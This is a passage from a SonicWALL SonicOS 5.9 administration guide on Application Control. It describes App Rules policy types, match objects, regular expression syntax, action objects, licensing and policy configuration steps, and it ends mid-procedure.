HTTP Client

Policy which is applicable to Web browser traffic or any HTTP request that originates on the client

Any / Any

Any / HTTP (configurable)

HTTP Host, HTTP Cookie, HTTP Referrer, HTTP Request Custom Header, HTTP URI Content, HTTP User Agent, Web Browser, File Name, File Extension Custom Object

Reset/Drop, Bypass DPI, Packet Monitor1, No Action, BWM Global-*, WAN BWM *

Client Side

HTTP Server

Response originated by an HTTP Server

Any / HTTP (configurable)

Any / Any

ActiveX Class ID, HTTP Set Cookie, HTTP Response, File Content Object, Custom Header, Custom Object

Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM *

Server Side

IPS Content

Policy using dynamic Intrusion Prevention related objects for any application layer protocol

N/A

N/A

IPS Signature Category List, IPS Signature List

Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM *

N/A

POP3 Client

Policy to inspect traffic generated by a POP3 client; typically useful for a POP3 server admin

Any / Any

POP3 (Retrieve Email) / POP3 (Retrieve Email)

Custom Object

Reset/Drop, Bypass DPI, Packet Monitor, No Action

Client Side

POP3 Server

Policy to inspect email downloaded from a POP3 server to a POP3 client; used for email filtering

POP3 (Retrieve Email) / POP3 (Retrieve Email)

Any / Any

Email Body, Email CC, Email From, Email To, Email Subject, File Name, File Extension, MIME Custom Header

Reset/Drop, Disable attachment, Bypass DPI, No action

Server Side

SMTP Client

Policy applies to SMTP traffic that originates on the client

Any / Any

SMTP (Send Email)/ SMTP (Send Email)

Email Body, Email CC, Email From, Email To, Email Size, Email Subject, Custom Object, File Content, File Name, File Extension, MIME Custom Header

Reset/Drop, Block SMTP E-Mail Without Reply, Bypass DPI, Packet Monitor, No Action

Client Side


1
Packet Monitor action is not supported for File Name or File Extension Custom Object.

Match Objects

Match objects represent the set of conditions which must be matched in order for actions to take place. This includes the object type, the match type (exact, partial, regex, prefix, or suffix), the input representation (text or hexadecimal), and the actual content to match. Match objects were referred to as application objects in previous releases.

Hexadecimal input representation is used to match binary content such as executable files, while alphanumeric (text) input representation is used to match things like file or email content. You can also use hexadecimal input representation for binary content found in a graphic image. Text input representation could be used to match the same graphic if it contains a certain string in one of its properties fields. Regular expressions (regex) are used to match a pattern rather than a specific string or value, and use alphanumeric input representation.

The File Content match object type provides a way to match a pattern or keyword within a compressed (zip/gzip) file. This type of match object can only be used with FTP Data Transfer, HTTP Server, or SMTP Client policies.

Supported Match Object Types describes the supported match object types.

 

Supported Match Object Types

Object Type

Description

Match Types

Negative Matching

Extra Properties

ActiveX ClassID

Class ID of an Active-X component. For example, ClassID of Gator Active-X component is “c1fb8842-5281-45ce-a271-8fd5f117ba5f”

Exact

No

None

Application Category List

Allows specification of application categories, such as Multimedia., P2P, or Social Networking

N/A

No

None

Application List

Allows specification of individual applications within the application category that you select

N/A

No

None

Application Signature List

Allows specification of individual signatures for the application and category that you select

N/A

No

None

CFS Allow/Forbidden List

Allows specification of allowed and forbidden domains for Content Filtering

Exact, Partial, Regex, Prefix, Suffix

No

None

CFS Category List

Allows selection of one or more Content Filtering categories

N/A

No

A list of 64 categories is provided to choose from

Custom Object

Allows specification of an IPS-style custom set of conditions.

Exact, Regex

No

There are 4 additional, optional parameters that can be set: offset (describes from what byte in packet payload we should start matching the pattern – starts with 1; helps minimize false positives in matching), depth (describes at what byte in the packet payload we should stop matching the pattern – starts with 1), minimum payload size and maximum payload size.

Email Body

Any content in the body of an email.

Partial, Regex

No

None

Email CC (MIME Header)

Any content in the CC MIME Header.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

Email From (MIME Header)

Any content in the From MIME Header.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

Email Size

Allows specification of the maximum email size that can be sent.

N/A

No

None

Email Subject (MIME Header)

Any content in the Subject MIME Header.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

Email To (MIME Header)

Any content in the To MIME Header.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

MIME Custom Header

Allows for creation of MIME custom headers.

Exact, Partial, Regex, Prefix, Suffix

Yes

A Custom header name needs to be specified.

File Content

Allows specification of a pattern to match in the content of a file. The pattern will be matched even if the file is compressed.

Partial, Regex

No

‘Disable attachment’ action should never be applied to this object.

File Name

In cases of email, this is an attachment name. In cases of HTTP, this is a filename of an uploaded attachment to the Web mail account. In cases of FTP, this is a filename of an uploaded or downloaded file.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

File Extension

In cases of email, this is an attachment filename extension. In cases of HTTP, this is a filename extension of an uploaded attachment to the Web mail account. In cases of FTP, this is a filename extension of an uploaded or downloaded file.

Exact

Yes

None

FTP Command

Allows selection of specific FTP commands.

N/A

No

None

FTP Command + Value

Allows selection of specific FTP commands and their values.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

HTTP Cookie

Allows specification of a Cookie sent by a browser.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

HTTP Host

Content found inside of the HTTP Host header. Represents hostname of the destination server in the HTTP request, such as www.google.com.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

HTTP Referer

Allows specification of content of a Referrer header sent by a browser – this can be useful to control or keep stats of which Web sites redirected a user to customer’s Web site.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

HTTP Request Custom Header

Allows handling of custom HTTP Request headers.

Exact, Partial, Regex, Prefix, Suffix

Yes

A Custom header name needs to be specified.

HTTP Response Custom Header

Allows handling of custom HTTP Response headers.

Exact, Partial, Regex, Prefix, Suffix

Yes

A Custom header name needs to be specified.

HTTP Set Cookie

Set-Cookie headers. Provides a way to disallow certain cookies to be set in a browser.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

HTTP URI Content

Any content found inside of the URI in the HTTP request.

Exact, Partial, Regex, Prefix, Suffix

No

None

HTTP URL

Any content found in the URL

Exact, Partial, Regex, Prefix, Suffix

No

None

HTTP User-Agent

Any content inside of a User-Agent header. For example: User-Agent: Skype.

Exact, Partial, Regex, Prefix, Suffix

Yes

None

Web Browser

Allows selection of specific Web browsers (MSIE, Netscape, Firefox, Safari, Chrome).

N/A

Yes

None

IPS Signature Category List

Allows selection of one or more IPS signature groups. Each group contains multiple predefined IPS signatures.

N/A

No

None

IPS Signature List

Allows selection of one or more specific IPS signatures for enhanced granularity.

N/A

No

None

You can see the available types of match objects in a drop-down menu in the Match Object Settings dialog.

In the Match Object Settings dialog, you can add multiple entries to create a list of content elements to match. All content that you provide in a match object is case-insensitive for matching purposes. A hexadecimal representation is used to match binary content. You can use a hex editor or a network protocol analyzer like Wireshark to obtain hex format for binary files. For more information about these tools, see the following sections:

You can use the Load From File button to import content from predefined text files that contain multiple entries for a match object to match. Each entry in the file must be on its own line. The Load From File feature allows you to easily move Application Control settings from one SonicWALL security appliance to another.

Multiple entries, either from a text file or entered manually, are displayed in the List area. List entries are matched using the logical OR, so if any item in the list is matched, the action for the policy is executed.

A match object can include a total of no more than 8000 characters. If each element within a match object contains approximately 30 characters, then you can enter about 260 elements. The maximum element size is 8000 bytes.

Topics:
Regular Expressions

You can configure regular expressions in certain types of match objects for use in App Rules policies. The Match Object Settings page provides a way to configure custom regular expressions or to select from predefined regular expressions. The SonicWALL implementation supports reassembly-free regular expression matching on network traffic. This means that no buffering of the input stream is required, and patterns are matched across packet boundaries.

SonicOS 5.9 provides these predefined regular expressions:

 

VISA CC

VISA Credit Card Number

US SSN

United States Social Security Number

CANADIAN SIN

Canadian Social Insurance Number

ABA ROUTING NUMBER

American Bankers Association Routing Number

AMEX CC

American Express Credit Card Number

MASTERCARD CC

Mastercard Credit Card Number

DISCOVER CC

Discover Credit Card Number

Policies using regular expressions will match the first occurrence of the pattern in network traffic. This enables actions on matches as soon as possible. Because matching is performed on network traffic and not only on human-readable text, the matchable alphabet includes the entire ASCII character set – all 256 characters.

Popular regular expression primitives such as ‘.’, (the any character wildcard), ‘*’, ‘?’, ‘+’, repetition count, alternation, and negation are supported. Though the syntax and semantics are similar to popular regular expression implementations such as Perl, vim, and others, there are some minor differences. For example, beginning (^) and end of line ($) operators are not supported. Also, ‘\z’ refers to the set of non-zero digits, [1-9], not to the end of the string as in PERL. For syntax information, see the Regular Expression Syntax.

One notable difference with the Perl regular expression engine is the lack of back-reference and substitution support. These features are actually extraneous to regular expressions and cannot be accomplished in linear time with respect to the data being examined. Hence, to maintain peak performance, they are not supported. Substitution or translation functionality is not supported because network traffic is only inspected, not modified.

Predefined regular expressions for frequently used patterns such as U.S. social security numbers and VISA credit card numbers can be selected while creating the match object. Users can also write their own expressions in the same match object. Such user provided expressions are parsed, and any that do not parse correctly will cause a syntax error to display at the bottom of the Match Object Settings window. After successful parsing, the regular expression is passed to a compiler to create the data structures necessary for scanning network traffic in real time.

Building a DFA

Regular expressions are matched efficiently by building a data structure called Deterministic Finite Automaton (DFA). The DFA’s size is dictated by the regular expression provided by the user and is constrained by the memory capacities of the device. A lengthy compilation process for a complex regular expression can consume extensive amounts of memory on the appliance. It may also take up to two minutes to build the DFA, depending on the expressions involved.

To prevent abuse and denial-of-service attacks, along with excessive impact to appliance management responsiveness, the compiler can abort the process and reject regular expressions that cause this data structure to grow too big for the device. An “abuse encountered” error message is displayed at the bottom of the window.

* 
NOTE: During a lengthy compilation, the appliance management session may become temporarily unresponsive, while network traffic continues to pass through the appliance.

Building the DFA for expressions containing large counters consumes more time and memory. Such expressions are more likely to be rejected than those that use indefinite counters such as the ‘*’ and ‘+’ operators.

Also at risk of rejection are expressions containing a large number of characters rather than a character range or class. That is, the expression ‘(a|b|c|d|. . .|z)’ to specify the set of all lower-case letters is more likely to be rejected than the equivalent character class ‘\l’. When a range such as ‘[a-z]’ is used, it is converted internally to ‘\l’. However, a range such as ‘[d-y]’ or ‘[0-Z]’ cannot be converted to any character class, is long, and may cause the rejection of the expression containing this fragment.

Whenever an expression is rejected, the user may rewrite it in a more efficient manner to avoid rejection using some of the above tips. For syntax information, see Regular Expression Syntax. For an example, discussing how to write a custom regular expression, see Creating a Regular Expression in a Match Object.

Regular Expression Syntax

The following tables show the syntax used in building regular expressions.

 

Syntax of Regular Expressions: Single Characters

Representation

Definition

.

Any character except ‘\n’. Use /s (stream mode, also known as single-line mode) modifier to match ‘\n’, too.

[xyz]

Character class. Can also give escaped characters. Special characters do not need to be escaped as they do not have special meaning within brackets [ ].

[^xyz]

Negated character class.

\xdd

Hex input. “dd” is the hexadecimal value for the character. Two digits are mandatory. For example, \r is \x0d and not \xd.

[a-z][0-9]

Character range.

 

Syntax of Regular Expressions: Composites

Representation

Definition

xy

x followed by y

x|y

x or y

(x)

Equivalent to x. Can be used to override precedences

 

Syntax of Regular Expressions: Repetitions

Representation

Definition

x*

Zero or more x

x?

Zero or one x

x+

One or more x

x{n, m}

Minimum of n and a maximum of m sequential x’s. All numbered repetitions are expanded. So, making m unreasonably large is ill-advised.

x{n}

Exactly n x’s

x{n,}

Minimum of n x’s

x{,n}

Maximum of n x’s

 

Syntax of Regular Expressions: Escape Sequences

Representation

Definition

\0, \a, \b, \f, \t, \n, \r, \v

‘C’ programming language escape sequences (\0 is the NULL character [ASCII character zero])

\x

Hex-input. \x followed by two hexadecimal digits denotes the hexadecimal value for the intended character.

\*, \?, \+, \(, \), \[, \], \{, \}, \\, \/,
\<space>, \#

Escape any special character.

NOTE: Comments that are not processed are preceded by any number of spaces and a pound sign (#). So, to match a space or a pound sign (#), you must use the escape sequences \ and \#.
 

Perl-Like Character Classes

Representation

Definition

\d, \D

Digits, non-digits.

\z, \Z

Non-zero digits ([1-9]), All other characters.

\s, \S

White space, Non-white space. Equivalent to [\t\n\f\r]. \v is not included in Perl white spaces.

\w, \W

Word characters, non-word characters equivalent to [0-9A-Za-z_].

 

Other ASCII Character Class Primitives

If you want...

... then use

 

[:cntrl:]

\c, \C

Control character. [\x00 - \x1F\x7F]

[:digit:]

\d, \D

Digits, non-digits. Same as Perl character class.

[:graph:]

\g, \G

Any printable character except space.

[:xdigit:]

\h, \H

Any hexadecimal digit. [a-fA-F0-9].

NOTE: This is different from the Perl \h, which means a horizontal space.

[:lower:]

\l, \L

Any lower case character

[:ascii:]

\p, \P

Positive, negative ASCII characters. [0x00 – 0x7F], [0x80 – 0xFF]

[:upper:]

\u, \U

Any upper case character

Some of the other popular character classes can be built from the above primitives. The following classes do not have their own short-hand due of the lack of a nice mnemonic for any of the remaining characters used for them.

 

Compound Character Classes

If you want...

... then use

 

[:alnum:]

= [\l\u\d]

The set of all characters and digits.

[:alpha:]

= [\l\u]

The set of all characters.

[:blank:]

= [\t<space>]

The class of blank characters: tab and space.

[:print:]

= [\g<space>]

The class of all printable characters: all graphical characters including space.

[:punct:]

= [^\P\c<space>\d\u\l]

The class of all punctuation characters: no negative ASCII characters, no control characters, no space, no digits, no upper or lower characters.

[:space:]

= [\s\v]

All white space characters. Includes Perl white space and the vertical tab character.

 

Modifiers

Representation

Definition

/i

Case-insensitive

/s

Treat input as single-line. Can also be thought of as stream-mode. That is, ‘.’ matches ‘\n’, too.

 

Operators in Decreasing Order of Precedence

Operators

Associativity

[ ], [^]

Left to right

()

Left to right

*, +, ?

Left to right

. (Concatenation)

Left to right

|

Left to right

Comments

SonicOS supports comments in regular expressions. Comments are preceded by any number of spaces and a pound sign (#). All text after a space and pound sign is discarded until the end of the expression.

Negative Matching

Negative matching provides an alternate way to specify which content to block. You can enable negative matching in a match object when you want to block everything except a particular type of content. When you use the object in a policy, the policy will execute actions based on absence of the content specified in the match object. Multiple list entries in a negative matching object are matched using the logical AND, meaning that the policy action is executed only when all specified negative matching entries are matched.

Although all App Rules policies are DENY policies, you can simulate an ALLOW policy by using negative matching. For instance, you can allow email .txt attachments and block attachments of all other file types. Or you can allow a few types, and block all others.

Not all match object types can utilize negative matching. For those that can, you will see the Enable Negative Matching check box on the Match Object Settings dialog.

Application List Objects

The Firewall > Match Objects page also contains the Add Application List Object button, which opens the Create Match Object dialog, which has two tabs:

Application – You can create an application filter object on this tab. This screen allows selection of the application category, threat level, type of technology, and attributes. After selections are made, the list of applications matching those criteria is displayed. The Application tab provides another way to create a match object of the Application List type. See Application Filters.
Category – You can create a category filter object on this tab. A list of application categories and their descriptions are provided. The Category page offers another way to create a match object of the Application Category List type. See Category Filters.
Application Filters

The Application tab provides a list of applications for selection. You can control which applications are displayed by selecting one or more application categories, threat levels, and technologies. You can also search for a keyword in all application names by typing it into the Search field near the top right of the display. For example, type in “bittorrent” into the Search field and click the Search icon to find multiple applications with “bittorrent” (not case-sensitive) in the name.

When the application list is reduced to a list that is focused on your preferences, you can select the individual applications for your filter by clicking the Plus icon next to them, and then save your selections as an application filter object with a custom name or an automatically generated name. Filtered Application List shows the dialog with all categories, threat levels, and technologies selected, but before any individual applications have been chosen.

Filtered Application List

As you select the applications for your filter, they appear in the Application Group field on the right. You can edit the list in this field by deleting individual items or by clicking the eraser to delete all items. Grouped Applications shows several applications in the Application Group field. The selected applications are also marked with a green check mark icon in the application list on the left side.

Grouped Applications

When finished selecting the applications to include, you can type in a name for the object in the Match Object Name field (first, clear the Auto-generate match object name check box) and click the Save Application Match Object button. You will see the object name listed on the Firewall > Match Objects page with an object type of Application List. This object can then be selected when creating an App Rules policy.

Match Objects created using the Auto-generate match object name option display a tilde (~) as the first character of the object name.

Category Filters

The Category tab provides a list of application categories for selection. You can select any combination of categories and then save your selections as a category filter object with a custom name. Customized Category Filter shows the tab with the description of the IM category displayed.

Customized Category Filter

You can hover your mouse pointer over each category in the list to see a description of it. To create a custom category filter object, simply type in a name for the object in the Match Object Name field (first, clear the Auto-generate match object name check box), select one or more categories, and click the Save Category Match Object button. You will see the object name listed on the Firewall > Match Objects page with an object type of Application Category List. This object can then be selected when creating an App Rules policy.

Match Objects created using the Auto-generate match object name option display a tilde (~) as the first character of the object name.

Action Objects

Action Objects define how the App Rules policy reacts to matching events. You can choose a customizable action or select one of the predefined, default actions.

The predefined actions are displayed in the App Control Policy Settings dialog when you add or edit a policy from the App Rules page.

A number of BWM action options are also available in the predefined, default action list. The BWM action options change depending on the Bandwidth Management Type setting on the Firewall Settings > BWM page. If the Bandwidth Management Type is set to Global, all eight priorities are selectable. If the Bandwidth Management Type is set to Advanced, no priorities are selectable, but the predefined priorities are available when adding a policy.

Default Actions for Adding a Policy shows predefined default actions that are available when adding a policy. Action Object Settings: Action Types shows both predefined and custom actions.

 

Default Actions for Adding a Policy

Always Available

If BWM Type = Global

If BWM Type = Advanced

Reset / Drop

No Action

Bypass DPI

Packet Monitor

BWM Global-Realtime

BWM Global-Highest

BWM Global-High

BWM Global-Medium High

BWM Global-Medium

BWM Global-Medium Low

BWM Global-Low

BWM Global-Lowest

Advanced BWM Low

Advanced BWM Medium

Advanced BWM High

For more information about BWM actions, see the Actions Using Bandwidth Management.

The following customizable actions are displayed in the Add/Edit Action Object dialog when you click Add New Action Object on the Firewall > Action Objects page:

Block SMTP Email - Send Error Reply
Disable Email Attachment - Add Text
Email - Add Text
FTP Notification Reply
HTTP Block Page
HTTP Redirect
Bandwidth Management

See Action Object Settings: Action Types for descriptions of these action types.

* 
NOTE: Only the customizable actions are available for editing in the Action Object Settings dialog, shown in the image below. The predefined actions cannot be edited or deleted. When you create a policy, the Policy Settings dialog provides a way for you to select from the predefined actions along with any customized actions that you have defined.
 

Action Object Settings: Action Types

Action Type

Description

Predefined or Custom

BWM Global-Realtime

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of zero.

Predefined

BWM Global-Highest

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 1.

Predefined

BWM Global-High

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts (default is 30%) and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 2.

Predefined

BWM Global-Medium High

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 3.

Predefined

BWM Global-Medium

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts (default is 50%) and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 4.

Predefined

BWM Global-Medium Low

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 5.

Predefined

BWM Global-Low

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts (default is 20%) and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 6.

Predefined

BWM Global-Lowest

Manages inbound and outbound bandwidth, can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth, sets a priority of 7.

Predefined

Bypass DPI

Bypasses Deep Packet Inspection components IPS, GAV, Anti-Spyware and Application Control. This action persists for the duration of the entire connection as soon as it is triggered. Special handling is applied to FTP control channels that are never bypassed for Application Control inspection. This action supports proper handling of the FTP data channel.

NOTE: Bypass DPI does not stop filters that are enabled on the Firewall Settings > SSL Control page.

Predefined

No Action

Policies can be specified without any action. This allows “log only” policy types.

Predefined

Packet Monitor

Use the SonicOS Packet Monitor capability to capture the inbound and outbound packets in the session, or if mirroring is configured, to copy the packets to another interface. The capture can be viewed and analyzed with Wireshark.

Predefined

Reset / Drop

For TCP, the connection will be reset. For UDP, the packet will be dropped.

Predefined

Advanced BWM High

Manages ingress and egress bandwidth, and can be configured for guaranteed and maximum bandwidth in varying amounts of the total available bandwidth.

Predefined

Advanced BWM Medium

Manages ingress and egress bandwidth, and can be configured for guaranteed and maximum bandwidth in varying amounts of the total available bandwidth.

Predefined

Advanced BWM Low

Manages ingress and egress bandwidth, and can be configured for guaranteed and maximum bandwidth in varying amounts of the total available bandwidth.

Predefined

Block SMTP Email - Send Error Reply

Blocks SMTP email and notifies the sender with a customized error message.

Custom

Disable Email Attachment - Add Text

Disables attachment inside of an email and adds customized text.

Custom

Email - Add Text

Appends custom text at the end of the email.

Custom

FTP Notification Reply

Sends text back to the client over the FTP control channel without terminating the connection.

Custom

HTTP Block Page

Allows a custom HTTP block page configuration with a choice of colors.

Custom

HTTP Redirect

Provides HTTP Redirect functionality. For example, if someone would like to redirect people to the Google Web site, the customizable part will look like: http://www.google.com
If an HTTP Redirect is sent from Application Control to a browser that has a form open, the information in the form will be lost.

Custom

Bandwidth Management

Allows definition of bandwidth management constraints with same semantics as Access Rule BWM policy definition.

Custom

Email Address Objects

Application Control allows the creation of custom email address lists as email address objects. You can only use email address objects in an SMTP client policy configuration. Email address objects can represent either individual users or the entire domain. You can also create an email address object that represents a group by adding a list of individual addresses to the object. This provides a way to easily include or exclude a group of users when creating an SMTP client policy.

For example, you can create an email address object to represent the support group:

After you define the group in an email address object, you can create an SMTP client policy that includes or excludes the group.

In the screenshot below, the settings exclude the support group from a policy that prevents executable files from being attached to outgoing email. You can use the email address object in either the MAIL FROM or RCPT TO fields of the SMTP client policy. The MAIL FROM field refers to the sender of the email. The RCPT TO field refers to the intended recipient.

Although Application Control cannot extract group members directly from Outlook Exchange or similar applications, you can use the member lists in Outlook to create a text file that lists the group members. Then, when you create an email address object for this group, you can use the Load From File button to import the list from your text file. Be sure that each email address is on a line by itself in the text file.

Licensing Application Control

Application Intelligence and Control has two components:

The Intelligence component is licensed as App Visualization and provides identification and reporting of application traffic on the Dashboard > Real-Time Monitor and Dashboard > App Flow Monitor pages in SonicOS 5.9.
The Control component is licensed as App Control and allows you to create and enforce custom App Control and App Rules policies for logging, blocking, and bandwidth management of application traffic handled by your network.

App Visualization and App Control are licensed together in a bundle with other security services including SonicWALL Gateway Anti-Virus (GAV), Anti-Spyware, and Intrusion Prevention Service (IPS).

* 
NOTE: Upon registration on MySonicWall, or when you load SonicOS 5.9 onto a registered SonicWALL device, supported SonicWALL appliances begin an automatic 30-day trial license for App Visualization and App Control, and application signatures are downloaded to the appliance.

A free 30-day trial is also available for the other security services in the bundle, but it is not automatically enabled as it is for App Visualization and App Control. You can start the additional free trials on the individual Security Services pages in SonicOS, or on MySonicWall.

Once the App Visualization feature is manually enabled on the Log > Flow Reporting page (see below), you can view real-time application traffic on the Dashboard > Real-Time Monitor page and application activity in other Dashboard pages for the identified/classified flows from the SonicWALL application signature database.

To begin using App Control, you must enable it on the Firewall > App Control Advanced page:

To create policies using App Rules (included with the App Control license), select Enable App Rules on the Firewall > App Rules page:

The SonicWALL Licensing server provides the App Visualization and App Control license keys to the SonicWALL device when you begin a 30-day trial (upon registration) or purchase a Security Services license bundle.

Licensing is available on https://www.MySonicWall.com/on the Service Management - Associated Products page under GATEWAY SERVICES.

The Security Services license bundle includes licenses for these subscription services:

App Visualization
App Control
Gateway Anti-Virus
Gateway Anti-Spyware
Intrusion Prevention Service

Application signature updates and signature updates for other Security Services are periodically downloaded to the SonicWALL appliance as long as these services are licensed.

* 
NOTE: If you disable Visualization in the SonicOS management interface, application signature updates are discontinued until the feature is enabled again.

When High Availability is configured between two SonicWALL appliances, the appliances can share the Security Services license. To use this feature, you must register the SonicWALL appliances on MySonicWall as Associated Products. Both appliances must be the same SonicWALL model.

* 
NOTE: For a High Availability pair, even if you first register your appliances on MySonicWall, you must individually register both the Primary and the Backup appliances from the SonicOS management interface while logged into the individual management IP address of each appliance. This allows the Backup unit to synchronize with the SonicWALL license server and share licenses with the associated Primary appliance. When Internet access is restricted, you can manually apply the shared licenses to both appliances.
* 
NOTE: App Visualization and App Control are not supported on the SonicWALL TZ 200 or 100 series appliances. These features are supported on SonicWALL TZ 210 series appliances, and on SonicWALL NSA appliances except the NSA 2400MX.

Glossary

Application layer: The seventh level of the 7-layer OSI model; examples of application layer protocols are AIM, DNS, FTP, HTTP, IMAP, MSN Messenger, POP3, SMTP, SNMP, TELNET, and Yahoo Messenger

Bandwidth management: The process of measuring and controlling the traffic on a network link to avoid network congestion and poor performance of the network

Client: Typically, the client (in a client-server architecture) is an application that runs on a personal computer or workstation, and relies on a server to perform some operations

Digital rights management: Technology used by publishers or copyright owners to control access to and usage of digital data

FTP: File Transfer Protocol, a protocol for exchanging files over the Internet

Gateway: A computer that serves as an entry point for a network; often acts as a firewall or a proxy server

Granular control: The ability to control separate components of a system

Hexadecimal: Refers to the base-16 number system

HTTP: Hyper Text Transfer Protocol, the underlying protocol used by the World Wide Web

HTTP redirection: Also known as URL redirection, a technique on the Web for making a Web page available under many URLs

IPS: Intrusion Prevention Service

MIME: Multipurpose Internet Mail Extensions, a specification for formatting non-ASCII messages such as graphics, audio, or video, so that they can be sent over the Internet

POP3: Post Office Protocol, a protocol used to retrieve email from a mail server; can be used with or without SMTP

Proxy: A computer that operates a network service that allows clients to make indirect network connections to other network services

SMTP: Simple Mail Transfer Protocol, a protocol used for sending email messages between servers

UDP: User Datagram Protocol, a connectionless protocol that runs on top of IP networks

Firewall > App Rules

You must enable Application Control before you can use it. App Control and App Rules are both enabled with global settings, and App Control must also be enabled on each network zone that you want to control.

You can configure App Control policies from the Dashboard > App Flow Monitor page by selecting one or more applications or categories and then clicking the Create Rule button. A policy is automatically created on the Firewall > App Rules page, and can be edited just like any other policy.

You can configure Application Control global blocking or logging policies for application categories, signatures, or specific applications on the Firewall > App Control Advanced page. Corresponding match objects are created. You can also configure match objects for these application categories, signatures, or specific applications on the Firewall > Match Objects page. The objects can be used in an App Rules policy, no matter how they were created.

You can configure policies in App Rules using the wizard or manually on the Firewall > App Rules page. The wizard provides a safe method of configuration and helps prevent errors that could result in unnecessary blocking of network traffic. Manual configuration offers more flexibility for situations that require custom actions or policies.

The Firewall > App Rules page contains two global settings:

Enable App Rules
Global Log Redundancy Filter
Topics:

Enabling App Rules

You must enable App Rules to activate the functionality. App Rules is licensed as part of App Control, which is licensed on https://www.MySonicWall.com/ on the Service Management - Associated Products page under GATEWAY SERVICES. You can view the status of your license at the top of the Firewall > App Rules page:

To enable App Rules and configure the global settings:
1
To enable App Rules, select the Enable App Rules checkbox.
2
To log all policy matches, leave the Global Log Redundancy Filter field set to 0. To enforce a delay between log entries for matches to the same policy, enter the number of seconds to delay.

Global log redundancy settings apply to all App Rules policies. If set to zero, a log entry is created for each policy match found in passing traffic. Other values specify the minimum number of seconds between log entries for multiple matches to the same policy. For example, a log redundancy setting of 10 will log no more than one message every 10 seconds for each policy match. Log redundancy can also be set on a per-policy basis in the Add/Edit Policy page where each individual policy configuration has its own log redundancy filter setting that can override the global log redundancy filter setting.

Prerequisites to Configuring App Rules Policies

When you have created a match object, and optionally, an action or an email address object, you are ready to create a policy that uses them. For information about these prerequisites to configuring App Rules, see the following sections:

For information about using the App Control Wizard to create a policy, see the Using the Application Control Wizard.

For information about policies and policy types, see App Rules Policy Creation.

Configuring App Rules Policies

To prepare for creating an App Rules policy, see Prerequisites to Configuring App Rules Policies.

To configure an App Rules policy:
1
Navigate to Firewall > App Rules.
2
Below the App Rules Policies table, click Add New Policy. The App Control Policies Settings dialog displays.

3
Enter a descriptive name into the Policy Name field.
4
Select a Policy Type from the drop-down menu. Your selection here will affect available options in the window. For information about available policy types, see App Rules Policy Creation.
5
Select a source and destination Address Group or Address Object from the Address drop-down menus. Only a single Address field is available for IPS Content, App Control Content, or CFS policy types.
6
Select the source or destination service from the Service drop-down menus. Some policy types do not provide a choice of service.
7
For Exclusion Address, optionally select an Address Group or Address Object from the drop-down menu. This address will not be affected by the policy.
8
For Match Object, select a match object from the drop-down menu. The list contains the defined match objects that are applicable to the policy type. When the policy type is HTTP Client, you can optionally select an Excluded Match Object.

The excluded match object provides the ability to differentiate subdomains in the policy. For example, if you wanted to allow news.yahoo.com but block all other yahoo.com sites, you would create match objects for both yahoo.com and news.yahoo.com. You would then create a policy with Match Object yahoo.com and Excluded Match Object news.yahoo.com.

* 
NOTE: The Exclusion Match Object does not take effect when the match object type is set to Custom Object. And Custom Objects cannot be selected as the Exclusion Match Object.
9
For Action, select an action from the drop-down menu. The list contains actions that are applicable to the policy type, and can include the predefined actions, plus any customized actions. For a log-only policy, select No Action.
10
For Users/Groups, select from the drop-down menus for both Included and Excluded. The selected users or group under Excluded will not be affected by the policy.
11
If the policy type is SMTP Client, select from the drop-down menu for MAIL FROM and RCPT TO, for both Included and Excluded. The selected users or group under Excluded will not be affected by the policy.
12
For Schedule, select from the drop-down menu. The menu provides a variety of schedules for the policy to be in effect.
13
If you want the policy to create a log entry when a match is found, select the Enable Logging check box.
14
To record more details in the log, select the Log individual object content check box.
15
If the policy type is IPS Content, select the Log using IPS message format check box to display the category in the log entry as “Intrusion Prevention” rather than “Application Control”, and to use a prefix such as “IPS Detection Alert” in the log message rather than “Application Control Alert.” This is useful if you want to use log filters to search for IPS alerts.
16
If the policy type is App Control Content, select the Log using App Control message format check box to display the category in the log entry as “Application Control”, and to use a prefix such as “Application Control Detection Alert” in the log message. This is useful if you want to use log filters to search for Application Control alerts.
17
If the policy type is CFS, select the Log using CFS message format check box to display the category in the log entry as “Network Access”, and to use a log message such as “Web site access denied” in the log message rather than no prefix. This is useful if you want to use log filters to search for content filtering alerts.
18
For Log Redundancy Filter, you can either select Global Settings to use the global value set on the Firewall > App Rules page, or you can enter a number of seconds to delay between each log entry for this policy. The local setting overrides the global setting only for this policy; other policies are not affected.
19
For Connection Side, select from the drop-down list. The available choices depend on the policy type and can include Client Side, Server Side, or Both, referring to the side where the traffic originates. IPS Content, App Control Content, or CFS policy types do not provide this configuration option.
20
For Direction, click either Basic or Advanced and select a direction from the drop-down menu:
Basic allows you to select incoming, outgoing, or both.
Advanced allows you to select between zones, such as LAN to WAN.
21
If the policy type is IPS Content, App Control Content, or CFS, select a zone from the Zone drop-down menu. The policy is applied to this zone.
22
